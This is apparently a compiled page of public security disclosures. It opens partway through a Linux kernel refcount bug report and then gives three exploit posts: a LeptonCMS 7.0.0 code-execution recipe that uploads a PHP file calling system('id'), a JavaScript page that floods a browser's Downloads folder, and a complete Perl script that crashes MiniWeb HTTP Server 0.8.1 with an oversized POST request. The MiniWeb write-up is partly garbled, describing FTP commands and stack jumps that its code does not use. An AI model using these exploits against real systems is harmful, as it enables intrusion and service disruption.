that method is. It requires knowing about all the various<br />reference paths that can hold references to `struct cred`, and what kinds of<br />multipliers or global limits apply at every point in this reference graph.<br /><br />I think the kernel should be using some flavor of saturating refcounts as the<br />default choice, at least on machines that have enough RAM to store 2^32<br />pointers.<br />If there are specific cases where the overhead is undesirable, I think we<br />should only omit such a check if we can document exactly how many references<br />can exist at most, with enough warning comments scattered around to ensure<br />that the assumptions can't accidentally be broken inadvertently later on.<br /><br />(Or the kernel could limit SLUB to a maximum of 32 GiB of memory except for<br />specially marked slabs that store objects guaranteed to not hold multiple<br />references to the same object, but I think people would probably hate that<br />idea.)<br /><br />(But note that refcount hardening also has value for protecting against bugs<br />where some repeatedly executed codepath forgets to decrement the refcount,<br />letting it drift up until it wraps around; and that kind of bug is also<br />exploitable without using ginormous amounts of RAM.)<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-02-26.<br /><br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code>## Exploit Title: LeptonCMS Version : 7.0.0 Remote Code Execution<br />### Date: 2024-1-19<br />### Exploit Author: tmrswrr<br />### Category: Webapps<br />### Vendor Homepage: https://www.lepton-cms.com/<br />### Version : 7.0.0<br />### Tested on: https://www.softaculous.com/apps/cms/LEPTON<br /><br />1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php<br />2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php<br />3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?><br />4 ) After click install you will be see result<br /><br />### Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)<br /><br /></code></pre>
<pre><code>Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)<br /><br />Tested on: firefox 121 and chrome 120 on GNU/linux<br /><br />Date: Thu Jan 18 08:38:28 AM UTC 2024<br /><br />This is barely a DoS, but since it might affect Chrome too we decided<br />to disclose it.<br /><br />If firefox user visits a specially crafted page, then firefox<br />may create many files in `~/Downloads`,<br />The user is notified about this in a small dialog, but there is<br />no option to stop the downloads.<br />The potential denial of service is that the user must manually<br />delete the created files and this might be PITA especially on<br />a phone.<br /><br />The code basically is:<br /><pre><br />URL = "data:text/plain;,a";//can be very large with no net traffic<br />link = document.createElement('a');<br />link.href = URL;<br />link.download = 'joro_';<br />document.body.appendChild(link);<br />function f() {<br />if( !confirm("This will ruin your device with probability up to 199.99%"))<br /> return;<br />setInterval("link.click();",1);//dobro<br />}<br />f();<br /></pre><br />There is no network traffic and in about 90 seconds firefox 121 created<br />3434 files at speed about 38 files/second.<br /><br />google chrome 120 prompts about multiple downloads, and if the user<br />allows it, it creates files at speed of 4.2 files/second, but<br />it gives modal prompts, which we couldn't close from the GUI and<br />had to kill the process.<br /><br />[Test online][1]: if you are vulnerable<br /><br />[1]: https://j.ludost.net/download2.html<br /><br />-- <br />guninski<br /><br /></code></pre>
<pre><code>#!/usr/bin/perl<br /><br />use IO::Socket;<br /><br /># Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)<br /># Discovery by: Fernando Mengali<br /># Discovery Date: 19 january 2024<br /># Vendor Homepage: N/A<br /># Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing <br /># Notification vendor: No reported<br /># Tested Version: MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)<br /># Tested on: Window XP Professional - Service Pack 2 and 3 - English<br /># Vulnerability Type: Denied of Service (DoS)<br /># Vídeo: https://www.youtube.com/watch?v=HbAy3RvHpAI<br /><br />#1. Description<br /><br />#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).<br />#For this exploit I have tried several strategies to increase reliability and performance:<br />#Jump to a static 'call esp'<br />#Backwards jump to code a known distance from the stack pointer.<br />#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.<br />#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.<br />#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.<br /><br />#2. Proof of Concept - PoC<br /><br /> $sis="$^O";<br /><br /> if ($sis eq "windows"){<br /> $cmd="cls";<br /> } else {<br /> $cmd="clear";<br /> }<br /><br /> system("$cmd");<br /> <br /> intro();<br /> main();<br /> <br /> print "[+] Exploiting... \n";<br /><br /> my $payload = "\x41" x 2038;<br /><br /> my $http_req = "POST /index.html HTTP/1.1\r\n";<br /> $http_req .= "Host: $ip\r\n";<br /> $http_req .= "From: header-data\r\n";<br /> $http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";<br /> $http_req .= $payload;<br /><br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $host,<br /> PeerPort => $port,<br /> Proto => 'tcp'<br />) or die "[-] Could not connect\n";<br /><br />$socket->send($http_req);<br />$socket->close();<br /><br /> print "[+] Done - Exploited success!!!!!\n\n";<br /> <br /> sub intro {<br /> print q {<br /><br /><br /> _/| <br /> // o\ <br /> || ._) <br /> //__\ <br /> )___( <br /><br /> [+] MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br /> sub main {<br /><br />our ($ip, $port) = @ARGV;<br /><br /> unless (defined($ip) && defined($port)) {<br /><br /> print " \nUsage: $0 <ip> <port> \n";<br /> exit(-1);<br /><br /> }<br /> }<br /></code></pre>